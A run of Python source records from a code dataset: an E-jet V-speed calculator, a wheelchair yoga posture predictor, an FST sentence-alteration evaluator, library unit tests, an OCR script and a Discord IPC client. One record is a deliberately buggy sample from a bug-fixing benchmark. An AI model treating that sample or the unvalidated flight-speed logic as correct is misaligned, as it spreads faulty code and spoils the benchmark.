0\n\n\n # print(df_vfs)\n def load_df(self):\n self.df_to_columns = pd.read_csv(\n '{}_to_columns.csv'.format(self.model), index_col=[0, 1, 2])\n self.df_vac = pd.read_csv('{}_vac.csv'.format(self.model), index_col=0)\n self.df_vfs = pd.read_csv('{}_vfs.csv'.format(self.model), index_col=0)\n self.df_vspeed = pd.read_csv(\n '{}_vspeed.csv'.format(self.model), index_col=[0, 1, 2])\n self.df_vref = pd.read_csv(\n '{}_vref.csv'.format(self.model), index_col=0)\n\n def find_to_col(self):\n press_alt = math.ceil(self.press_alt / 1000) * 1000\n # print(self.press_alt)\n # print(press_alt)\n s_to_columns =\\\n self.df_to_columns.ix[self.to_flaps].ix[self.to_mode].ix[press_alt]\n column = 0\n for i in range(10):\n if s_to_columns[i] > self.OAT_C:\n column = math.floor(i / 2) + 1\n break\n self.to_columm = column\n\n def find_vspeed(self):\n weight = math.ceil(self.weight_kg / 1000) * 1000\n # print(weight)\n s_vspeeds = self.df_vspeed.ix[\n self.to_flaps].ix[self.to_mode].ix[weight]\n # print(s_vspeeds)\n self.v1 = int(s_vspeeds[(self.to_columm * 3 - 3)])\n self.vr = int(s_vspeeds[(self.to_columm * 3 - 2)])\n self.v2 = int(s_vspeeds[(self.to_columm * 3 - 1)])\n\n def find_vfs(self):\n weight = math.ceil(self.weight_kg / 1000) * 1000\n self.vfs = int(self.df_vfs.ix[weight][0])\n\n def find_vac(self):\n weight = math.ceil(self.weight_kg / 1000) * 1000\n vac_col = self.appr_flaps // 2 - 1\n self.vac = int(self.df_vac.ix[weight][vac_col])\n\n def find_vref(self):\n weight = math.ceil(self.weight_kg / 1000) * 1000\n vref_col = self.land_flaps - 5\n if self.icing:\n vref_col += 2\n self.vref = int(self.df_vref.ix[weight][vref_col])\n\n def find_vapp(self):\n # weight = math.ceil(self.weight_kg / 1000) * 1000\n if self.wind_true_heading == 0:\n self.wind_true_heading = 360\n self.rwy_true_heading = self.rwy_mag_heading - self.magvar\n if self.rwy_mag_heading < 0:\n self.rwy_mag_heading += 360\n if self.wind_true_heading <= self.rwy_true_heading + 180:\n angle = abs(self.wind_true_heading - self.rwy_true_heading)\n else:\n angle = self.rwy_true_heading + 360 - self.wind_true_heading\n headwind_component = math.cos(math.radians(angle)) * self.wind_speed\n if self.wind_gusts > self.wind_speed:\n gust_adjustment = self.wind_gusts - self.wind_speed\n else:\n gust_adjustment = 0\n self.vapp = 
int(math.ceil(min(self.vref + 20, self.vref + 5 +\n gust_adjustment + max(\n 0, headwind_component / 3))))\n\n def input_takeoff(self):\n self.weight_kg = self.input_with_default(self.weight_kg, 'Enter takeoff mass in kg [{:d}]: ')\n self.field_elevation = self.input_with_default(self.field_elevation, 'Enter departure field elevation in ft MSL [{:d}]: ')\n self.to_flaps = self.input_with_default(self.to_flaps, 'Enter takeoff flap setting (1-5) [{:d}]: ')\n self.to_mode = self.input_with_default(self.to_mode, 'Enter takeoff mode (1-2) [TO-{:d}]: TO-')\n self.OAT_C = self.input_with_default(self.OAT_C, 'Outside Air Temperature [{:d} deg. C]: ')\n self.altimeter_inHg = self.input_with_default(self.altimeter_inHg, 'Enter local altimeter setting in inHg [{:0.2f}]: ', input_type='float')\n self.press_alt = std_atm.pressure_alt(self.field_elevation, self.altimeter_inHg)\n\n def input_landing(self):\n self.weight_kg = self.input_with_default(self.weight_kg, 'Enter Landing mass in kg [{:d}]: ')\n # self.field_elevation = self.input_with_default(self.field_elevation, 'Enter departure field elevation in ft MSL [{:d}]: ')\n self.appr_flaps = self.input_with_default(self.appr_flaps, 'Enter approach flaps setting (2 or 4) [{:d}]: ')\n self.land_flaps = self.input_with_default(self.land_flaps, 'Enter landing flaps setting (5 or 6=FULL) [{:d}]: ')\n self.icing = self.input_with_default(self.icing, 'Icing [{}]: ', input_type='bool')\n self.rwy_mag_heading = self.input_with_default(self.rwy_mag_heading, 'Enter runway magnetic heading [{:03}]: ')\n self.magvar = self.input_with_default(self.magvar, 'Enter MAGVAR (+W) [{:d}]: ')\n self.wind_true_heading = self.input_with_default(self.wind_true_heading, 'Enter wind true heading [{:03}]: ')\n self.wind_speed = self.input_with_default(self.wind_speed, 'Enter windspeed [{:d}] kt: ')\n self.wind_gusts = self.input_with_default(self.wind_gusts, 'Enter wind gust magnitude [{:d}]: ')\n\n\n # self.to_flaps = int(input('Enter takeoff flap setting (1-5) [{:d}]: '.format(self.to_flaps)))\n # self.to_mode = int(input('Enter takeoff mode (1-2) [TO-{:d}]: TO-'.format(self.to_mode)))\n # self.OAT_C = int(input('Outside Air Temperature [{:d} deg. 
C]: '.format(self.OAT_C)))\n # self.altimeter_inHg = int(input('Enter local altimeter setting in inHg [{:0.2f}]: '.format(self.altimeter_inHg)))\n\n # def input_landing(self):\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n\n def input_with_default(self, default, prompt, input_type = 'int'):\n str_prompt = prompt.format(default)\n response = input(str_prompt)\n if response is None:\n return default\n elif response == '':\n return default\n else:\n if input_type == 'float':\n return float(response)\n elif input_type == 'str':\n return response\n elif input_type == 'bool':\n return bool(response)\n else:\n return int(response)\n\n\nweight_kg = 28500 # kg\nfield_elevation = 2500 # ft\nto_flaps = 2\nto_mode = 2\nappr_flaps = 2\nland_flaps = 5\nicing = False\naltimeter_inHg = 30.02 # in Hg\nOAT_C = 17 # deg C\naltimeter_inHg= 29.92\nrunway_heading = 53\nwind_true_heading = 90\nwind_speed = 15\nwind_gusts = 40\n\nperformance = Takeoff_Land()\nperformance.input_takeoff()\n\n# load data frames\nperformance.load_df()\n# determine v speed column\nperformance.find_to_col()\n# find v speeds\nperformance.find_vspeed()\n# find vfs\nperformance.find_vfs()\n\nprint()\nprint('Take Off')\nprint('Flaps: {}'.format(performance.to_flaps))\nprint('TO-{}'.format(performance.to_mode))\nprint('OAT: {}'.format(performance.OAT_C))\nprint(\"Pressure Altitude: {:.0f}'\".format(performance.press_alt))\nprint('Weight: {} kg'.format(performance.weight_kg))\nprint('V1: {}'.format(performance.v1))\nprint('Vr: {}'.format(performance.vr))\nprint('V2: {}'.format(performance.v2))\nprint('VFS: {}'.format(performance.vfs))\nprint()\n\nperformance.input_landing()\n# find vfs\nperformance.find_vfs()\n# find vac\nperformance.find_vac()\n# find landing speeds\nperformance.find_vref()\nperformance.find_vapp()\n\n\nprint('Landing')\nprint('Weight: {} kg'.format(performance.weight_kg))\nprint('Landing Flaps: {}'.format(performance.land_flaps))\nprint('Icing: ' + str(performance.icing))\nprint('Runway Heading: {:03}'.format(performance.rwy_mag_heading))\nif performance.wind_gusts > 0:\n gust_string = 'G{}'.format(performance.wind_gusts)\nelse:\n gust_string = ''\nprint('Winds: {:03}/{}'.format(performance.wind_true_heading, performance.wind_speed) + gust_string)\nprint('VFS: {}'.format(performance.vfs))\nprint('VAC: {}'.format(performance.vac))\nprint('VAPP: {}'.format(performance.vapp))\nprint('VREF: {}'.format(performance.vref))\n\n\n# print(performance.press_alt)\n\n\n# def v_speeds(press_alt, OAT, flaps, 
weight_kg):\n\n# def _to_column(OAT, press_alt, flaps, to_mode)\n\n# return v1, vr, v2\n","sub_path":"performance/e_jet_calc/e_jet.py","file_name":"e_jet.py","file_ext":"py","file_size_in_byte":10316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"68700737","text":"from dotenv import load_dotenv\nimport os\nimport pickle\nimport serial\nimport pygatt\nimport numpy as np\nimport pyaudio\nimport wave\nimport time\n\nfrom dcd.entities.thing import Thing\nfrom dcd.entities.property import PropertyType\n\n# The thing ID and access token\nload_dotenv()\nTHING_ID = os.environ['THING_ID']\nTHING_TOKEN = os.environ['THING_TOKEN']\n\n\n# Where to read the model from\nMODEL_FILE_NAME = \"model.pickle\"\n\n# load classifier\nwith open(\"model.pickle\", 'rb') as file:\n neigh = pickle.load(file)\n\n# classes = [\"Not Sitting\", \"Proper Sitting\", \"Leaning Forward\",\n# \"Leaning Backward\", \"Leaning Left\", \"Leaning Right\"]\n\nclasses = [\"Not Sitting\", \"Proper Sitting\", \"Leg Stretch Right\",\n \"Leg Stretch Left\", \"Twist Right\", \"Twist Left\", \"Forward Bend\"]\n\nLABEL_PROP_NAME = \"Yoga Wheelchair\"\nDATA_PROP_NAME = \"fsrYoga\"\n# Read data from serial port\nser = serial.Serial(\n port=os.environ['SERIAL'],\n baudrate=115200,\n timeout=2)\n\n\n\"\"\"\nFor connecting to the Bluetooth feather\n\"\"\"\nBLUETOOTH_DEVICE_MAC = os.environ['BLUETOOTH_DEVICE_MAC']\n\n# UUID of the GATT characteristic to subscribe\nGATT_CHARACTERISTIC_POSTURE = \"02118833-4455-6677-8899-AABBCCDDEEFF\"\n# Many devices, e.g. Fitbit, use random addressing, this is required to connect.\nADDRESS_TYPE = pygatt.BLEAddressType.random\n# Start a BLE adapter\nbleAdapter = pygatt.GATTToolBackend()\nbleAdapter.start()\n# User the BLE adapter to connect to our device\nmy_device = bleAdapter.connect(BLUETOOTH_DEVICE_MAC, address_type=ADDRESS_TYPE)\n\nprint(\"MY DEVICE: \")\nprint(my_device)\n\ndef timer():\n now = time.localtime(time.time())\n return now[5]\n\ndef discover_characteristic(device):\n for uuid in device.discover_characteristics().keys():\n try:\n print(\"Read UUID\" + str(uuid) + \" \" + str(device.char_read(uuid)))\n except:\n print(\"Something wrong with \" + str(uuid))\n\n\ndef sendByBluetooth(x):\n\n x_Bytes = bytes(x)\n\n my_device.char_write(GATT_CHARACTERISTIC_POSTURE, x_Bytes)\n\n\ndef audioList(x):\n if x is 1:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/3_posture_1_right_side.wav', 23)\n elif x is 2:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/4_posture_1_left.wav', 26)\n elif x is 3:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/5_posture_2_side_1.wav', 20)\n elif x is 4:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/6_posture_2_side_2.wav', 26)\n elif x is 5:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/7_pose_3_down.wav', 22)\n elif x is 6:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/8_back_to_comfortable_position.wav', 7)\n\n # play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/9_try_again.wav', 10))\n# If default it will play the last audio\n\nstarttime = time.time()\n\nprevResult = 0\ncounter = 0\nexpectedPos = 1\n\ndef predict(values):\n\n global prevResult\n global counter\n global expectedPos\n\n result = neigh.predict(values)\n\n currentPos = int(result[0])\n\n \"\"\"\n 7. Updates the value of the 'Yoga Wheelchair' property in the DCD Hub\n \"\"\"\n prop_label.update_values([currentPos])\n\n if result == prevResult:\n counter = counter + 1\n prevResult = result\n else:\n counter = 0\n prevResult = result\n\n \"\"\"\n 8. 
Check if the current posture equals the expected one without\n changing during 100 loop repetitions\n \"\"\"\n if counter >= 100 and currentPos == expectedPos:\n \"\"\"\n 9. Send the required position via Bluetooth to the Feather\n \"\"\"\n sendByBluetooth(result + 1)\n \"\"\"\n 10. Play audio, guiding the user to start with the next posture\n \"\"\"\n audioList(currentPos)\n expectedPos += 1\n counter = 0\n\n print(\" \" + str(counter) + \" CURRENT POSITION = \" + str(classes[result[0]]) + \" EXPECTED POSITION = \" + str(classes[expectedPos]))\n\n\nprev_button_value = 0\n\n\ndef serial_to_property_values():\n\n global prev_button_value\n\n line_bytes = ser.readline()\n\n # If the line is not corrupted\n if len(line_bytes) > 20:\n try:\n # Convert the bytes into string\n line = line_bytes.decode('utf-8')\n str_values = line.split(',B,')\n fsrString_values = str_values.pop(0)\n\n button_value = int(str_values.pop(0))\n\n print(\"button_value = \" + str(button_value) + \" prev_button_value = \" + str(prev_button_value))\n\n fsrValues = fsrString_values.split(',')\n\n values = [float(x) for x in fsrValues]\n\n \"\"\"\n 4. Updates the values of the 'fsrYoga' property in the DCD Hub\n \"\"\"\n prop_data.update_values(values)\n\n values = [values]\n\n \"\"\"\n 5. Starts Yoga Session\n \"\"\"\n if button_value == 1 and button_value != prev_button_value:\n print(\"Start the Yoga session\")\n prev_button_value = button_value\n sendByBluetooth([1])\n\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/1_intro_yoga.wav', 47)\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/2_intro_postures.wav', 11)\n\n \"\"\"\n 6. Uses the algorithm to predict the current posture of the user\n based on the readings of the 9 FSRs\n \"\"\"\n np.array(values).reshape(1, -1)\n predict(values)\n\n except:\n print(\"cant parse\")\n\ndef play_sound(file, duration):\n\n print(\"playing audio\")\n CHUNK = 1024\n\n # Load the WAV file\n wf = wave.open(file, 'rb')\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\n\n data = wf.readframes(CHUNK)\n\n start_time = time.time()\n play = True\n while data != b'' and play:\n stream.write(data)\n data = wf.readframes(CHUNK)\n if time.time()-start_time > duration:\n play = False\n\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n\n\n\"\"\"\n 1. Connects with the Data Centric Design Hub\n\"\"\"\n# Instantiate a thing with its credential\nmy_thing = Thing(thing_id=THING_ID, token=THING_TOKEN)\n\n# Read the details of our Thing from the DCD Hub to get property details\nmy_thing.read()\n\n# Find label and data property by name, create classes if none\nprop_label = my_thing.find_or_create_property(LABEL_PROP_NAME, PropertyType.CLASS)\nif prop_label.classes is None or len(prop_label.classes) == 0:\n prop_label.create_classes(classes)\n\nprop_data = my_thing.find_or_create_property(DATA_PROP_NAME, PropertyType.NINE_DIMENSIONS)\n\n\n\"\"\"\n2. Reads the characteristics defined by the feather\n\"\"\"\ndiscover_characteristic(my_device)\n\n\n\"\"\"\n3. Reads the Serial Port uninterruptedly extracting the value of the 9 FSRs\nand the button in separate variables.\n\"\"\"\nwhile True:\n serial_to_property_values()\n","sub_path":"wheelchair3/3_predict_&_Actuate.py","file_name":"3_predict_&_Actuate.py","file_ext":"py","file_size_in_byte":7228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"649716771","text":"#!/usr/bin/env python3 \n\nimport sys\nimport tokenizer\nimport pywrapfst as fst\nimport math\nimport functools\nimport operator\nimport getopt\nimport random\n\nclass AlterSent:\n def __init__(self, unifname, lmfname, maxtypes=0):\n self.unigrams = []\n with open(unifname, 'r', encoding='utf-8') as fp:\n for line in fp:\n toks = line.split()\n self.unigrams.append((toks[0], float(toks[1])))\n self.unigrams = sorted(self.unigrams, key=lambda t: t[1])\n self.lmfst = fst.Fst.read(lmfname)\n self.maxtypes = maxtypes\n\n def fst_alter_sent(self, words, numalts=5):\n # create new empty FST\n altfst = fst.Fst()\n altfst.add_state()\n \n for idx, word in enumerate(words):\n # add the word to the lattice or if out-of-vocabulary\n if word in self.lmfst.input_symbols():\n word_id = self.lmfst.input_symbols().find(word)\n arc = fst.Arc(word_id, word_id, 0, self.get_state_id(idx+1, altfst))\n altfst.add_arc(self.get_state_id(idx, altfst), arc)\n else:\n word_id = self.lmfst.input_symbols().find(\"\")\n arc = fst.Arc(word_id, word_id, 0, self.get_state_id(idx+1, altfst))\n altfst.add_arc(self.get_state_id(idx, altfst), arc)\n\n # add word alternatives to the lattice\n nearlist = []\n for i in range(1):\n r = random.random()\n altword = ''\n p = 0\n for w, wp in self.unigrams:\n p = p + wp\n if p > r:\n altword = w\n break\n nearlist.append(altword)\n #nearlist = None\n\n # check if there are any neighbors at all\n if nearlist == None:\n continue\n\n # add each neighbor to the lattice\n for widx, w in enumerate(nearlist):\n if w in self.lmfst.input_symbols() and w != word:\n w_id = self.lmfst.input_symbols().find(w)\n arc = fst.Arc(w_id, w_id, 0, self.get_state_id(idx+1, altfst))\n altfst.add_arc(self.get_state_id(idx, altfst), arc)\n\n # mark the final state in the FST\n altfst.set_final(len(words))\n altfst.set_start(0)\n\n # sort lattice prior to rescoring\n altfst.arcsort()\n\n # rescore the lattice using the language model\n scoredfst = fst.compose(self.lmfst, altfst)\n\n # get best paths in the rescored lattice\n bestpaths = fst.shortestpath(scoredfst, nshortest=numalts)\n bestpaths.rmepsilon()\n\n altstrings = {}\n\n # get the strings and weights from the best paths\n for i, path in enumerate(self.paths(bestpaths)):\n path_string = ' '.join((bestpaths.input_symbols().find(arc.ilabel)).decode('utf-8') for arc in path)\n path_weight = functools.reduce(operator.add, (float(arc.weight) for arc in path))\n if not path_string in altstrings:\n altstrings[path_string] = path_weight\n \n # sort strings by weight\n scoredstrings = []\n for sent in altstrings:\n score = altstrings[sent]\n scoredstrings.append((score, sent))\n scoredstrings.sort()\n \n if len(scoredstrings) > numalts:\n scoredstrings = scoredstring[:numalts]\n \n return scoredstrings\n\n # helper function to check if state is in FST and add state if not\n def get_state_id(self, state, f):\n if state in f.states():\n return state\n s = f.add_state()\n return s\n\n # helper function to conduct depth first search on all paths in an FST\n def get_paths(self, state, f, prefix=()):\n if float(f.final(state)) != float('inf'):\n yield prefix\n for arc in f.arcs(state):\n for path in self.get_paths(arc.nextstate, f, prefix+(arc,)):\n yield path\n\n # get list of all paths in FST f\n def paths(self, f):\n return self.get_paths(f.start(), f)\n\ndef main(argv):\n fstfname = ''\n fname = ''\n\n try:\n opts, args = getopt.getopt(argv, \"hu:f:\")\n except getopt.GetoptError:\n print(\"awer.py -u -f \")\n sys.exit(1)\n for 
opt, arg in opts:\n if opt == '-h':\n print(\"awer.py -u -f \")\n sys.exit()\n elif opt == '-u':\n fname = arg\n elif opt == '-f':\n fstfname = arg\n\n if fname == '' or fstfname == '':\n print(\"awer.py -u -f \")\n sys.exit(1)\n\n lv = AlterSent(fname, fstfname, 50000)\n #print(\"Ready\")\n totalerr = 0\n linecnt = 0\n for line in sys.stdin:\n linecnt += 1\n words = tokenizer.word_tokenize(line)\n lines = lv.fst_alter_sent(words,1)\n toks = lines[0][1].split()\n err = 0\n for i in range(len(words)):\n if words[i] != toks[i]:\n err += 1\n \n if len(words) > 0:\n totalerr += err / len(words)\n if linecnt > 0:\n totalerr = totalerr / linecnt\n print(\"AWER: %.5f\" % totalerr)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"eval/awer.py","file_name":"awer.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"120925144","text":"import unittest\nfrom .utils import Asn1ToolsBaseTest\nimport asn1tools\n\n\nclass Asn1ToolsCheckConstraintsTest(Asn1ToolsBaseTest):\n\n maxDiff = None\n\n def test_all_codecs(self):\n codecs = [\n 'ber',\n 'der',\n 'gser',\n 'jer',\n 'per',\n 'uper',\n 'xer'\n ]\n\n for codec in codecs:\n foo = asn1tools.compile_string(\n \"Foo DEFINITIONS AUTOMATIC TAGS ::= \"\n \"BEGIN \"\n \"A ::= INTEGER \"\n \"END\",\n codec)\n\n with self.assertRaises(NotImplementedError):\n foo.check_constraints('A', 0)\n\n def test_integer(self):\n foo = asn1tools.compile_string(\n \"Foo DEFINITIONS AUTOMATIC TAGS ::= \"\n \"BEGIN \"\n \"A ::= INTEGER \"\n \"B ::= INTEGER (5..99) \"\n \"C ::= INTEGER (-10..10) \"\n \"D ::= INTEGER (5..99, ...) \"\n \"E ::= INTEGER (1000..1000) \"\n \"F ::= SEQUENCE { \"\n \" a INTEGER (4..4), \"\n \" b INTEGER (40..40), \"\n \" c INTEGER (400..400) \"\n \"} \"\n \"G ::= B (6..7) \"\n \"END\")\n\n # Ok.\n datas = [\n ('A', 32768),\n ('A', 0),\n ('A', -32769),\n ('B', 5),\n ('B', 6),\n ('B', 99),\n ('C', -10),\n ('C', 10),\n ('D', 99),\n ('E', 1000),\n ('F', {'a': 4, 'b': 40, 'c': 400})\n ]\n\n for type_name, decoded in datas:\n with self.assertRaises(NotImplementedError):\n foo.check_constraints(type_name, decoded)\n\n # Not ok.\n datas = [\n ('B', 4, ': 4 does not fulfill 5..99'),\n ('B', 100, ': 100 does not fulfill 5..99'),\n ('C', -11, ': -11 does not fulfill -10..10'),\n ('C', 11, ': 11 does not fulfill -10..10'),\n ('D', 100, ': 100 does not fulfill 5..99'),\n ('E', 0, ': 0 does not fulfill 1000..1000'),\n ('F',\n {'a': 4, 'b': 41, 'c': 400},\n 'b: 41 does not fulfill 40..40')\n ]\n\n for type_name, decoded, message in datas:\n with self.assertRaises(NotImplementedError):\n with self.assertRaises(asn1tools.ConstraintsError) as cm:\n foo.check_constraints(type_name, decoded)\n\n self.assertEqual(str(cm.exception), message)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_check_constraints.py","file_name":"test_check_constraints.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"553033439","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Path hack\nimport os, sys\nsys.path.insert(0, os.path.abspath('..'))\n\nfrom threading import Thread\nimport unittest\nfrom requests_cache.backends.storage.dbdict import DbDict, DbPickleDict\n\nDB_NAME = 'test'\n\n\nclass DbdictTestCase(unittest.TestCase):\n def test_save_to_same_database(self):\n d1 = DbDict(DB_NAME, 'table1')\n d2 = DbDict(DB_NAME, 'table2')\n d3 = DbDict(DB_NAME, 'table3')\n d1[1] = 1\n d2[2] = 2\n d3[3] = 3\n self.assertEqual(list(d1.keys()), [1])\n self.assertEqual(list(d2.keys()), [2])\n self.assertEqual(list(d3.keys()), [3])\n\n def test_bulk_commit(self):\n d = DbDict(DB_NAME, 'table')\n d.clear()\n n = 1000\n with d.bulk_commit():\n for i in range(n):\n d[i] = i\n self.assertEqual(list(d.keys()), list(range(n)))\n\n def test_switch_commit(self):\n d = DbDict(DB_NAME)\n d.clear()\n d[1] = 1\n d = DbDict(DB_NAME)\n self.assertIn(1, d)\n\n d.can_commit = False\n d[2] = 2\n\n d = DbDict(DB_NAME)\n self.assertNotIn(2, d)\n self.assert_(d.can_commit)\n\n def test_str(self):\n d = DbDict(DB_NAME)\n d.clear()\n d[1] = 1\n d[2] = 2\n self.assertEqual(str(d), '{1: 1, 2: 2}')\n\n def test_del(self):\n d = DbDict(DB_NAME)\n d.clear()\n for i in range(5):\n d[i] = i\n del d[0]\n del d[1]\n del d[2]\n self.assertEqual(list(d.keys()), list(range(3, 5)))\n\n with self.assertRaises(KeyError):\n del d[0]\n\n def test_picklable_dict(self):\n d = DbPickleDict(DB_NAME)\n d[1] = ForPickle()\n d = DbPickleDict(DB_NAME)\n self.assertEqual(d[1].a, 1)\n self.assertEqual(d[1].b, 2)\n\n def test_len(self):\n d = DbDict(DB_NAME)\n d.clear()\n n = 5\n for i in range(n):\n d[i] = i\n self.assertEqual(len(d), n)\n\n def test_fast_save(self):\n d1 = DbDict(DB_NAME, fast_save=True)\n d2 = DbDict(DB_NAME, 'data2', fast_save=True)\n d1.clear()\n n = 1000\n for i in range(n):\n d1[i] = i\n d2[i * 2] = i\n # HACK if we will not sort, fast save can produce different order of records\n self.assertEqual(sorted(d1.keys()), list(range(n)))\n self.assertEqual(sorted(d2.values()), list(range(n)))\n\n def test_usage_with_threads(self):\n\n def do_test_for(d, n_threads=5):\n d.clear()\n fails = []\n def do_inserts(values):\n try:\n for v in values:\n d[v] = v\n except Exception:\n fails.append(1)\n raise\n\n def values(x, n):\n return [i * x for i in range(n)]\n\n threads = [Thread(target=do_inserts, args=(values(i, n_threads),))\n for i in range(n_threads)]\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n\n self.assert_(not fails)\n for i in range(n_threads):\n for x in values(i, n_threads):\n self.assertEqual(d[x], x)\n\n do_test_for(DbDict(DB_NAME, fast_save=True), 20)\n do_test_for(DbPickleDict(DB_NAME, fast_save=True), 10)\n d1 = DbDict(DB_NAME, fast_save=True)\n d2 = DbDict(DB_NAME, 'table123', fast_save=True)\n do_test_for(d1)\n do_test_for(d2)\n do_test_for(DbDict(DB_NAME))\n\n\nclass ForPickle(object):\n a = 1\n b = 2\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_dbdict.py","file_name":"test_dbdict.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"392399008","text":"def get_cursor_from_index(self, index):\n 'Return the (row, col) of the cursor from text index.\\n '\n index = boundary(index, 0, len(self.text))\n if (index <= 0):\n return (0, 0)\n lf = self._lines_flags\n l = self._lines\n i = 0\n for row in range(len(l)):\n ni = (i + len(l[row]))\n if (lf[row] & FL_IS_LINEBREAK):\n ni += 1\n i += 1\n if (ni >= index):\n return ((index - i), row)\n i = ni\n return (index, row)","sub_path":"Data Set/bug-fixing-5/efc9bcc42ebcb61d169ed902508a3abbf062ccb9--bug.py","file_name":"efc9bcc42ebcb61d169ed902508a3abbf062ccb9--bug.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"394503538","text":"import pytesseract\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport pickle\n\nimg = cv2.imread('video_stuff/time_stamps/000000.png')\n\nthresh_value = 230\n\nnew_width = 300\ndiff_x = 50\ndiff_y = 30\nnew_height = 90\nimg_width = 206\nimg_height = 31\n\nocr_prepare = np.zeros((new_height, new_width, 3))\n\n\nvideo_location = '../../scenarios/videos_0905/gilles_video.mp4'\n\nframe_location = 'D:/test/'\n\ncap = cv2.VideoCapture(video_location)\n\nocr_results = []\n\ni = 0\nf = open('results.txt', 'w')\nwhile cap.isOpened():\n ret, frame = cap.read()\n if ret == False:\n break\n if i % 100 == 0:\n print(\"============================\")\n time = frame[0:190, 870:1280]\n # r = time[:, :, 0]\n # g = time[:, :, 1]\n # b = time[:, :, 2]\n # indices = np.logical_and(np.logical_and(r > thresh_value, g > thresh_value), b > thresh_value).astype(np.uint8) * 255\n # ocr_prepare[diff_y:diff_y + img_height, diff_x:diff_x + img_width] += time\n # cv2.imshow('image', ocr_prepare)\n # cv2.waitKey(0)\n result = pytesseract.image_to_string(time)\n print(f'{i}: {result}')\n f.write(result + '\\n')\n\n i+=1\n\nf.close()\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"server/scripts/test_tess.py","file_name":"test_tess.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"377804362","text":"import socket\nimport os\nimport json\nimport struct\n\nclass DiscordRPC:\n def __init__(self):\n self.discordSocket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n\n socketDir = None\n envVars = [\"XDG_RUNTIME_DIR\", \"TMPDIR\", \"TMP\", \"TEMP\"]\n for var in envVars:\n if not var == None:\n socketDir = os.environ.get(var)\n break\n if socketDir == None:\n socketDir = \"/tmp\"\n\n # can be discord-ipc-[0-9]\n for pipeNum in range(0, 10):\n try:\n self.discordSocket.connect(f\"{socketDir}/discord-ipc-{pipeNum}\")\n break\n except socket.error as e:\n # throw exception if all possibilities are exhausted with no success\n if pipeNum == 9:\n raise e\n\n def read(self):\n data = self.discordSocket.recv(4096)\n # fix character encoding errors\n return data.decode(\"utf-8\", errors=\"ignore\")\n\n def write(self, opcode, payload):\n payload = json.dumps(payload)\n # frame structure shown in RpcConnection::Open(), rpc_connection.cpp, reference implementation\n self.discordSocket.send(struct.pack(\"ii\", opcode, len(payload)) + payload.encode(\"utf-8\"))\n \n def init(self, client_id):\n self.write(0, {\"v\": 1, \"client_id\": client_id})\n\n def sendRichPresence(self, pid, activity):\n payload = {\n \"cmd\": \"SET_ACTIVITY\",\n \"args\": {\n \"pid\": pid,\n \"activity\": activity\n },\n \"nonce\": str(os.urandom(16))\n }\n self.write(1, payload)\n \n def close(self):\n self.discordSocket.close()\n","sub_path":"venv/Lib/site-packages/discordrpc/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
